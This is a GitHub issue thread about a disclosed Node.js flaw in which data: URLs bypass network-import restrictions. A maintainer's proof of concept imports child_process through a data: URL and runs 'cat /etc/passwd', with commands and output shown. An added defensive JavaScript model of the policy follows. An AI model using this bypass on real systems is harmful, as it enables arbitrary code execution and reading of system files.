
Security question: Why are data: URIs and file: URIs treated differently in your security policy? #53815

Closed
eligrey opened this issue Jul 11, 2024 · 5 comments
Labels
question Issues that look for answers. security Issues and PRs related to security.

Comments

@eligrey

eligrey commented Jul 11, 2024

Version

No response

Platform

No response

Subsystem

No response

What steps will reproduce the bug?

I noticed this bug report and asked @RafaelGSS why data: URIs are treated differently from file: URIs in the Node.js security policy, as attackers can simply write to a file and then import it to achieve the same effect.

Rafael responded with the following, asking me to file an issue in this bug tracker instead of elaborating on X:

This vulnerability exposes a vulnerability according to the Node.js threat model. I can expand more on that if you raise an issue.

But I certainly won't elaborate on a X thread :)

How often does it reproduce? Is there a required condition?

No response

What is the expected behavior? Why is that the expected behavior?

No response

What do you see instead?

N/A. I was requested by @RafaelGSS to use this issue reporting form.

Additional information

No response

@eligrey eligrey changed the title Security question: why are data: URIs and file: URIs treated differently in your security policy? Security question: Why are data: URIs and file: URIs treated differently in your security policy? Jul 11, 2024
@avivkeller
Member

avivkeller commented Jul 11, 2024

@nodejs/security-wg
CC @RafaelGSS

@avivkeller avivkeller added question Issues that look for answers. security Issues and PRs related to security. labels Jul 11, 2024
@RafaelGSS
Member

So a couple of things first:

  1. The report was disclosed in limited form, so that explains why you can only read the summary:

     A security flaw in Node.js allows a bypass of network import restrictions.
     By embedding non-network imports in data URLs, an attacker can execute arbitrary code, compromising system security.
     Verified on various platforms, the vulnerability is mitigated by forbidding data URLs in network imports.
     Exploiting this flaw can violate network import security, posing a risk to developers and servers.

     I will try to adjust it either way.

  2. I believe your question is unrelated to the vulnerability itself. I will provide more details about the report, but I might not be the best person to explain our resolvers.

Imagine you have an HTTP server with two routes:

  1. /indirect -> returns:

         import childProcess from 'data:text/javascript,export { default } from "node:child_process"'
         import http from 'data:text/javascript,export { default } from "node:http"'

         console.log('BYPASSED')
         const data = childProcess.execSync('cat /etc/passwd')

  2. /direct -> returns:

         import fs from 'node:fs/promises'

While the /direct route produces the expected result:

    $ node --experimental-network-imports --import 'http://127.0.0.1:9999/direct.mjs' --eval ''

    Error [ERR_NETWORK_IMPORT_DISALLOWED]: import of 'node:fs/promises' by http://localhost:9999/direct.mjs is not supported: only relative and absolute specifiers are supported.

the /indirect route is a bypass of this feature's expectations:

    $ node --experimental-network-imports --import 'http://127.0.0.1:9999/indirect.mjs' --eval ''
    BYPASS

@RafaelGSS
Member

Also note, that we are discussing removing this feature entirely #53822.

@eligrey
Author

eligrey commented Jul 12, 2024

Your response does not acknowledge my question about file: URIs.

I am repeating my question: Why are data: URIs treated differently from file: URIs? Attackers can simply write to a file and then import it to achieve the same effect.

@ghost

ghost commented Jul 12, 2024

If you look at the docs for network imports, there's a special restriction.

Cannot load non-network dependencies

These modules cannot access other modules that are not over http: or https:.

The intention is that file: and node: imports will fail under a network import. This means a network import has no way to access the file system and so could not write to a file.

What seems to have happened here is that embedding the prohibited import in a data: URL made it work, and gave access to the file system, etc., which shouldn't have been possible.
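The policy that RafaelGSS's two routes and the comment above describe, written out as an added example for this page. This is not Node.js's resolver and does not reproduce the project's code; it is a small model of the stated rule (a module loaded over http(s) may only import relative or absolute http(s) specifiers). The `legacy` mode is a constructed approximation of the pre-fix behaviour the bypass relied on, in which a data: target was accepted and a data: module's own imports were judged by the data: parent alone. The `fixed` mode applies the mitigation named in the report summary (data: URLs refused from network modules) and, as a defence-in-depth step that goes beyond what the page states, also looks through data: parents to the nearest ancestor that is not a data: URL. The route URLs and the data: shim are the ones from the report; the helper names `isRelativeOrAbsolute`, `checkImport` and `demo` are this example's own.

```javascript
// Added example, not Node.js's own resolver: a model of the network-import policy
// discussed in the issue. chain[0] is the module doing the import, chain[1] the
// module that imported it, and so on (URL strings).

const NETWORK = new Set(['http:', 'https:']);

// Relative ('./x', '../x', '/x') or scheme-prefixed ('node:fs', 'data:...')
// specifiers have a URL form; anything else is a bare specifier such as 'lodash'.
function isRelativeOrAbsolute(specifier) {
  return /^(\.\.?\/|\/)/.test(specifier) || /^[a-z][a-z0-9+.-]*:/i.test(specifier);
}

// mode: 'legacy' (constructed pre-fix approximation) or 'fixed' (mitigation).
function checkImport(specifier, chain, mode = 'fixed') {
  const parent = new URL(chain[0]);
  // 'legacy' judges by the immediate parent only. 'fixed' looks through data:
  // parents to the nearest ancestor that is not a data: URL, so a data: module
  // handed to us by an http(s) module is still held to the network rules.
  const policyParent = mode === 'fixed'
    ? (chain.map((u) => new URL(u)).find((u) => u.protocol !== 'data:') ?? parent)
    : parent;

  if (!NETWORK.has(policyParent.protocol)) {
    // Local (file:) parents are not restricted. In 'legacy' mode this branch is
    // the hole: a data: parent is not a network URL, so nothing is checked.
    return { allowed: true, reason: `${policyParent.protocol} parent is not a network module` };
  }
  if (!isRelativeOrAbsolute(specifier)) {
    return { allowed: false, reason: 'only relative and absolute specifiers are supported' };
  }
  let target;
  try {
    target = new URL(specifier, parent);
  } catch {
    return { allowed: false, reason: `cannot resolve '${specifier}' against ${parent.href}` };
  }
  if (target.protocol === 'data:') {
    return mode === 'fixed'
      ? { allowed: false, reason: 'data: imports are not allowed from a network module' }
      : { allowed: true, reason: 'data: URL accepted (pre-fix approximation)' };
  }
  if (!NETWORK.has(target.protocol)) {
    return { allowed: false, reason: `import of '${specifier}' by ${parent.href} is not supported` };
  }
  return { allowed: true, reason: 'network module importing a network module' };
}

// The two routes from the report, expressed as import chains (constructed sample data).
const DIRECT = 'http://127.0.0.1:9999/direct.mjs';
const INDIRECT = 'http://127.0.0.1:9999/indirect.mjs';
const DATA_SHIM = 'data:text/javascript,export { default } from "node:child_process"';

function demo(mode) {
  return {
    // /direct: http module imports node:fs/promises straight away
    direct: checkImport('node:fs/promises', [DIRECT], mode).allowed,
    // /indirect, step 1: http module imports a data: URL
    dataShim: checkImport(DATA_SHIM, [INDIRECT], mode).allowed,
    // /indirect, step 2: the data: module imports node:child_process; its
    // immediate parent is the data: URL, not the http module
    viaData: checkImport('node:child_process', [DATA_SHIM, INDIRECT], mode).allowed,
  };
}

console.log('legacy', demo('legacy')); // direct false, dataShim true,  viaData true  (bypass)
console.log('fixed ', demo('fixed'));  // direct false, dataShim false, viaData false
```

Run with `node`. The `legacy` row reproduces the shape of the bypass: the direct import is refused, but the data: shim is accepted and its inner `node:` import is never examined because its parent is not a network URL. The `fixed` row closes both ends: the data: target is refused at step 1, and even if a data: module were reached some other way, its imports are attributed to the http(s) ancestor at step 2.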
